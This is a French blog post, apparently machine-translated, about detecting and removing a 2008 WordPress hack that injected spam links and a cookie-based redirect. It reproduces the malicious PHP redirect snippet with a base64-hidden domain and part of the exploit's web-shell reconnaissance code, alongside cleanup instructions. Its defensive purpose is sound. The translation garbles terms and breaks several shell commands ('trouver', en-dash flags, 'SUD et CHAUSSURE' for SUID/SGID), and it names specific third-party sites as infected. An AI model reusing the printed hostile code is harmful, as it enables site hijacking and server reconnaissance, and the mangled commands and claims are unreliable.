Le mois dernier, j'ai continué à recevoir des avertissements de virus dans le blog de certains visiteurs. Au départ, j'ai ignoré les avertissements, car j'avais installé un assez bon antivirus (Kaspersky AV 2009) et bien que j'ai passé beaucoup de temps sur le blog, je n'ai jamais reçu l'alerte virus (.. il y a quelque temps j'ai vu quelque chose de suspect, qui a disparu au premier rafraîchissement. enfin...).
Lentement, lentement, de grandes variations ont commencé à apparaître trafic de visiteurs, après quoi dernièrement le trafic a diminué constamment et il y a de plus en plus de gens qui me disent que stealthsettings.com c'est virus. Hier, j'ai reçu de quelqu'un une capture d'écran prise lorsque l'antivirus en bloquait une scénario de furtifsettings.com :Trojan-Clicker.HTML.IFrame.gr. C'était suffisamment convaincant pour moi que j'ai commencé à le chercher dans toutes les sources. La première idée qui m'est venue à l'esprit était de le faire mise à niveau à la dernière version de WordPress (2.5.1), mais pas avant d'avoir supprimé tous les anciens fichiers de script WordPress et d'avoir fait sauvegarde de la base de données. Cette procédure n'a donné aucun résultat et il m'aurait probablement fallu beaucoup de temps pour comprendre où se trouvait le bug s'il ne me l'avait pas dit. Eugène lors d'une discussion autour d'un café, qu'il a découvert un lien sur Google et ce serait bien de le voir.
MyDigitalLife.info, a publié un article intitulé : "WordPress Hack : Récupérez et corrigez Google et les moteurs de recherche ou aucun trafic de cookies redirigé vers Your-Needs.info, AnyResults.Net, Golden-Info.net et d'autres sites illégaux», qui est la fin du fil dont j'avais besoin.
Il s'agit d'un exploiter par WordPress basé sur des cookies, ce qui à mon avis est très complexe et réalisé conformément au livre. Assez intelligent pour en fabriquer un Injection SQL dans la base de données des blogs, pour créer un utilisateur invisible à un simple contrôle de routine de Tableau de bord->Utilisateurs, pour vérifier les répertoires et fichiers "inscriptibles" sur le serveur (qui ont chmod 777), pour rechercher et exécuter fichiers avec des privilèges de groupe ou même root. Je ne connais pas le nom de l'exploit et je vois qu'il y a peu d'articles écrits à ce sujet, malgré le fait qu'il existe de nombreux blogs infectés, notamment en Roumanie. Ok... je vais essayer d'essayer d'expliquer les généralités sur ce virus.

Que fait le virus ?

Tout d’abord, il insère dans les sources des pages des blogs, des liens invisibles pour les visiteurs mais visibles et indexables pour les moteurs de recherche, notamment Google. De cette façon transférer le Page Rank vers les sites indiqués par l'attaquant. Deuxièmement, un autre est inséré code de redirection URL, pour les visiteurs qui proviennent de Google, Live, Yahoo, ... ou d'un lecteur RSS et n'ont pas le site en biscuit. Et antivirus détecte cette redirection comme Trojan-Clicker.HTML.

Symptômes:

La baisse massive du trafic visiteurs, notamment sur les blogs où la plupart des visiteurs proviennent de Google.

Identifier: (c'est là que le problème se complique pour ceux qui ne connaissent pas grand chose à phpmyadmin, php et linux)

LE. PRUDENT!!! FAITES D'ABORD UNE SAUVEGARDE DE LA BASE DE DONNÉES !!!

1. Vérifiez les sources des fichiers index.php, en-tête.php, pied de page.php, à partir du sujet du blog et voyez s'il existe un code qui utilise le cryptage base64 ou contient "if($ser=="1? && sizeof($_COOKIE)==0) » sous la forme :

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... ou quelque chose de similaire. Supprimez ce code !

Cliquez pour imaginer…

Dans la capture d'écran ci-dessus, j'ai sélectionné par erreur "<?php get_header(); ?>Ce code doit rester.

2. Utiliser phpmyadmin et allez dans la table de la base de données wp_utilisateurs, où vous vérifiez s'il existe un utilisateur sans nom, créé sur 00:00:00 0000-00-00 (c'est possible sur le terrain connexion_utilisateur écrivez "WordPress". Notez l'ID de cet utilisateur (champ ID), puis supprimez-le.

Cliquez pour imaginer…

*celui sur la ligne verte, son identifiant doit être supprimé et conservé. Dans son cas somnolent, était ID=8 .

3. Allez à table wp_usermeta, où il faut situé tu es SUPPRIMER les lignes liées à l'ID (où dans le champ ID de l'utilisateur la valeur de l'ID supprimé apparaît).

4. Dans le tableau wp_option, entre plugins_actifs et voyez quel plugin est activé de manière suspecte. Il peut utiliser des terminaisons comme _old.giff, _old.pngg, _old.jpeg, _new.php.giff, etc. combinaisons de fausses extensions d'images avec _old et _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Supprimez ce plugin, puis allez sur le blog –> Tableau de bord -> Plugins, où vous désactivez et activez un certain plugin.

Cliquez sur l'image pour voir comment le fichier infecté apparaît dans active_plugins.

Suivez le chemin FTP ou SSH indiqué dans active_plugins et supprimez le fichier du serveur.

5. Également dans phpMyAdmin, dans le tableau wp_option, recherchez et supprimez la ligne contenant "rss_f541b3abd05e7962fcab37737f40fad8"et tourne"liens_cache_internes".
Dans internal_links_cache, les liens spam qui apparaissent dans le blog et un Code Google Adsense, du pirate informatique.

6. Il est recommandé changer le mot de passe de vous connecter sur le blog et ainsi supprimer tous les utilisateurs suspects. Mettez à niveau vers la dernière version de WordPress et configurez le blog pour ne plus autoriser l'enregistrement de nouveaux utilisateurs. Il n'y a aucune perte... même les non-connectés peuvent commenter.

J'ai essayé d'expliquer ci-dessus combien, que faire dans une telle situation, pour nettoyer le blog de ce virus. Le problème est bien plus grave qu’il n’y paraît et n’est pas loin d’être résolu, car ils sont utilisés failles de sécurité du serveur Web d'hébergement sur lequel se trouve le blog.

Comme première mesure de sécurité, qui a accès Ssh, pour vérifier sur le serveur s'il existe encore des fichiers comme *_old* et *_new.* avec les terminaisons .gif, .jpeg, .pngg, .jpgg. Ces fichiers doivent être supprimés. Si nous renommeons un fichier, par ex. top_right_old.giff dans top_right_old.php, on voit que le fichier contient exactement le code d'exploit du serveur.

Quelques conseils utiles pour vérifier, nettoyer et sécuriser le serveur. (via SSH)

1 et 1 cd/tmp et vérifiez s'il existe de tels dossiers tmpVFlma ou d'autres combinaisons de noms similaires et supprimez-le. Vous pouvez voir dans la capture d'écran ci-dessous deux de ces dossiers pour moi :

rm –rf numérodossier

2. Vérifiez et éliminez (changez le chmod) autant que possible les dossiers avec des attributs chmod 777

trouver tous les fichiers accessibles en écriture dans le répertoire actuel : trouver . -type f -perm -2 -ls
trouver tous les répertoires accessibles en écriture dans le répertoire actuel : trouver . -type d -perm -2 -ls
trouver tous les répertoires et fichiers accessibles en écriture dans le répertoire actuel : trouver . -perm -2 –ls

3. Recherchez les fichiers suspects sur le serveur.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, PRUDENT!!! aux fichiers qui définissent le bit SUD et CHAUSSURE. Ces fichiers s'exécutent avec les privilèges de l'utilisateur (groupe) ou du root, et non avec ceux de l'utilisateur qui exécute le fichier. Ces fichiers peuvent conduire à une compromission racine en cas de problèmes de sécurité. Si vous n'utilisez pas de fichiers avec les bits SUID et SGID, exécutez "chmod 0" sur eux ou désinstallez le package les contenant.

L'exploit contient quelque part dans les sources... :

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

...c'est pratiquement ainsi qu'il découvre les failles de sécurité. Ports ouverts, répertoires « inscriptibles » et exécution de fichiers avec privilèges groupe/root.

Je reviendrai avec des détails...

Quelques blogs infectés: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiologie.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... et la liste peut s'allonger... beaucoup de choses.

Vous pouvez vérifier si un blog est infecté en utilisant le moteur de recherche Google. copie & coller :

site : www.blegoo.com acheter

Bonne nuit et bon travail ;) Bientôt je pense qu'Eugen viendra avec des nouvelles, sur prevezibil.imprevizibil.com.

brb :)

À : ATTENTION ! Changer le thème WordPress ou passer à WordPress 2.5.1 n'est PAS une solution pour se débarrasser de ce virus.